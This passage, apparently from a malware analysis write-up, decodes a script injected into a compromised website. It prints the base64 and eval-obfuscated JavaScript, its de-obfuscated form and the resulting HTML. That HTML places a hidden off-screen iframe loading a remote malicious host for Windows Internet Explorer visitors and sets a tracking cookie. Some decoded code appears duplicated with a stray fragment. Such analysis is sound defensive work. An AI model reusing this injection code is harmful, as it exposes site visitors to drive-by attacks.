c3LDgyLDcxLDY2LDM5LDQwLDMxLDU4LDQ1LDQ4LDM5LDEyMCwxMyw5LDcsNiwxMDAsMTEwLDk3LDExNCwxMDksMTAwLDEwOCwxMTMsNDYsMTE4LDExMiwxMDIsMTE2LDEwMCwzOCwzNiw2MCwxMTQsMTE0LDExOCwxMDgsMTAwLDYwLDQzLDExNSwzOCw0MSwxMTIsMTE2LDEwOSwxMDcsNDAsMzksMzEsMTIxLDI5LDExMiwxMTAsMTEzLDEwMiwxMTYsMTA0LDEwOSwxMDcsNTgsOTYsOTYsMTEyLDExMSwxMDcsMTE1LDExMywxMDEsNTgsMzAsMTA1LDEwMSwxMDEsMTE0LDU1LDQ1LDM4LDQxLDEwMCwxMTQsOTYsMzgsNTEsNDgsNDcsNDIsNDYsNDgsNDcsNDYsMzgsNDMsMzgsMTEwLDExNyw1OSwzMSwxMTQsMTA4LDExMiw1Nyw0MywzNiw0MywxMDIsMTEyLDk0LDQwLDUzLDQ2LDQ1LDQ0LDQ4LDQ2LDQ1LDQ4LDQwLDQxLDM2LDExMiwxMTksNTcsMjksMTI1LDU5LDQ1LDExMiwxMTYsMTIwLDEwNiw5OCw2MiwzMSw1OCw5NywxMDUsMTE3LDMwLDk2LDEwOCw5NiwxMTMsMTEyLDYxLDMzLDExMywzNiw0MywxMTQsMTE0LDEwNywxMDksNDIsMzcsMzEsNjIsNTksMTAzLDk5LDExNCw5NiwxMDcsOTgsMzIsMTE0LDExMiw5Niw2MSwzMywxMDIsMTEzLDExNiwxMTEsNTYsNDQsNDcsMTA3LDk5LDk4LDExMCwxMDMsMTA0LDExNywxMTUsMTIwLDQ0LDEwNiwxMjEsMTAxLDExNyw0MywxMTcsMTE0LDQ1LDk0LDEwMCw0NiwxMDAsOTgsMTAxLDk5LDQ0LDEwOSwxMDQsMTExLDMyLDI5LDExOSwxMDQsOTgsMTEzLDEwNCw2MCwzMiwzNiw0MywxMDIsMTEyLDk0LDQwLDUwLDQ2LDQ1LDQ0LDUzLDQ2LDQ1LDQxLDQyLDM3LDMxLDMyLDEwMyw5OSwxMDIsMTAzLDEwMywxMTQsNTgsMzQsMzgsNDEsMTAwLDExNCw5NiwzOCw0OCw0OCw0Nyw0Miw1MSw0OCw0NywzOSw0MCwzOSwzMyw2MCw1Nyw0NywxMDQsMTAwLDExMSw5NywxMDgsOTksNTksNjAsNDYsOTgsMTAyLDExOCw2MSwzNywzOCw1OSwxMiw4LDYsMTI1LDEyLDgsNiwxMTgsOTYsMTEyLDI5LDEwMSwxMTksMTEwLDU4LDExMCwxMDAsMTE3LDI5LDY4LDk2LDExNCw5OCw0MCw0MCw1Nyw5OCwxMjAsMTExLDQ0LDExMiwxMDEsMTE1LDY2LDk0LDExNiwxMDAsMzgsOTgsMTIwLDExMSw0NCwxMDAsMTAxLDExNSw2Niw5NCwxMTYsMTAwLDM4LDM4LDQzLDU0LDM5LDU2LDEzLDksNywxMDIsMTAyLDM5LDk4LDEwOCw5OSwxMTYsMTA3LDk4LDExMCwxMTUsNDQsOTYsMTExLDExMCwxMDUsMTAyLDEwMSw0NSwxMDMsMTA3LDEwMCwxMDAsMTE4LDc2LDEwMiwzOSwzNyw5Miw5NSwxMTYsMTE0LDEwNiwxMDIsMTEzLDU5LDM2LDQxLDYwLDU5LDQyLDQ5LDQwLDEyMSw5NywxMTEsOTgsMTE1LDEwNiwxMDEsMTA5LDExNCw0Myw5OSwxMTAsMTA5LDEwNCwxMDUsMTAwLDU5LDM2LDk1LDk0LDExNSwxMTMsMTA5LDEwMSwxMTIsNTgsMzksNDIsMTEyLDExMiw0MCw0MCw0MSwzNiw1OSwzMSw5OSwxMTcsMTEyLDEwNCwxMTIsOTgsMTE1LDYwLDM3LDQwLDEwMSwxMTksMTEwLDQzLDExNiwxMTAsNjksNzQsODQsODIsMTE0LDExMSwxMDUsMTA5LDEwMSwzNyw0MSw0MiwzNyw1NiwzMiwxMTEsOTUsMTEzLDEwNCw2MCw0NSwzNiw1OSwxMjQsMTEsNywxMjUpO313PWY7cz1bXTtmb3IoaT0wOy1pKzcwOSE9MDtpKz0xKXtqPWk7aWYoKDAzMT09MHgxOSkpaWYoZSlzPXMrU3RyaW5nLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoImolNCIpKSk7fXh6PWU7eHoocyl9').'</script>'); } }
While it is starting to be a little more readable we still have another long base64 encoded string, plug that into the decoder and we can now see the JavaScript that is appearing in the pages of the site.
try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,105,101,38,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,117,96,44,102,110,99,99,117,79,101,38,36,77,82,71,66,39,40,31,58,45,48,39,120,13,9,7,6,100,110,97,114,109,100,108,113,46,118,112,102,116,100,38,36,60,114,114,118,108,100,60,43,115,38,41,112,116,109,107,40,39,31,121,29,112,110,113,102,116,104,109,107,58,96,96,112,111,107,115,113,101,58,30,105,101,101,114,55,45,38,41,100,114,96,38,51,48,47,42,46,48,47,46,38,43,38,110,117,59,31,114,108,112,57,43,36,43,102,112,94,40,53,46,45,44,48,46,45,48,40,41,36,112,119,57,29,125,59,45,112,116,120,106,98,62,31,58,97,105,117,30,96,108,96,113,112,61,33,113,36,43,114,114,107,109,42,37,31,62,59,103,99,114,96,107,98,32,114,112,96,61,33,102,113,116,111,56,44,47,107,99,98,110,103,104,117,115,120,44,106,121,101,117,43,117,114,45,94,100,46,100,98,101,99,44,109,104,111,32,29,119,104,98,113,104,60,32,36,43,102,112,94,40,50,46,45,44,53,46,45,41,42,37,31,32,103,99,102,103,103,114,58,34,38,41,100,114,96,38,48,48,47,42,51,48,47,39,40,39,33,60,57,47,104,100,111,97,108,99,59,60,46,98,102,118,61,37,38,59,12,8,6,125,12,8,6,118,96,112,29,101,119,110,58,110,100,117,29,68,96,114,98,40,40,57,98,120,111,44,112,101,115,66,94,116,100,38,98,120,111,44,100,101,115,66,94,116,100,38,38,43,54,39,56,13,9,7,102,102,39,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,45,103,107,100,100,118,76,102,39,37,92,95,116,114,106,102,113,59,36,41,60,59,42,49,40,121,97,111,98,115,106,101,109,114,43,99,110,109,104,105,100,59,36,95,94,115,113,109,101,112,58,39,42,112,112,40,40,41,36,59,31,99,117,112,104,112,98,115,60,37,40,101,119,110,43,116,110,69,74,84,82,114,111,105,109,101,37,41,42,37,56,32,111,95,113,104,60,45,36,59,124,11,7,125);}w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}
A "de-obfuscation" of the JavaScript and the purpose of the code becomes clear
function gra(a, b){
return Math.floor(Math.random() * (b - a + 1)) + a;
}
function rs(){
return Math.random().toString(36).substring(5);
}
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) +
'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm +
'"><iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) +
'" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
if (document.cookie.indexOf('__utmfr=') ==- 1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}
return Math.floor(Math.random() * (b - a + 1)) + a;
}
function rs(){
return Math.random().toString(36).substring(5);
}
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
if (ua.indexOf('Windows') !=- 1 && ua.indexOf('MSIE') !=- 1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) +
'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm +
'"><iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) +
'" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
if (document.cookie.indexOf('__utmfr=') ==- 1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}
When the JavaScript is executed by the users browser we get a hidden iframe loading malicious content from another site.
<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4">
<iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="564" height="303"></iframe></div>
<iframe src="http://leenhjxsy.myfw.us/ad/feed.php" width="564" height="303"></iframe></div>
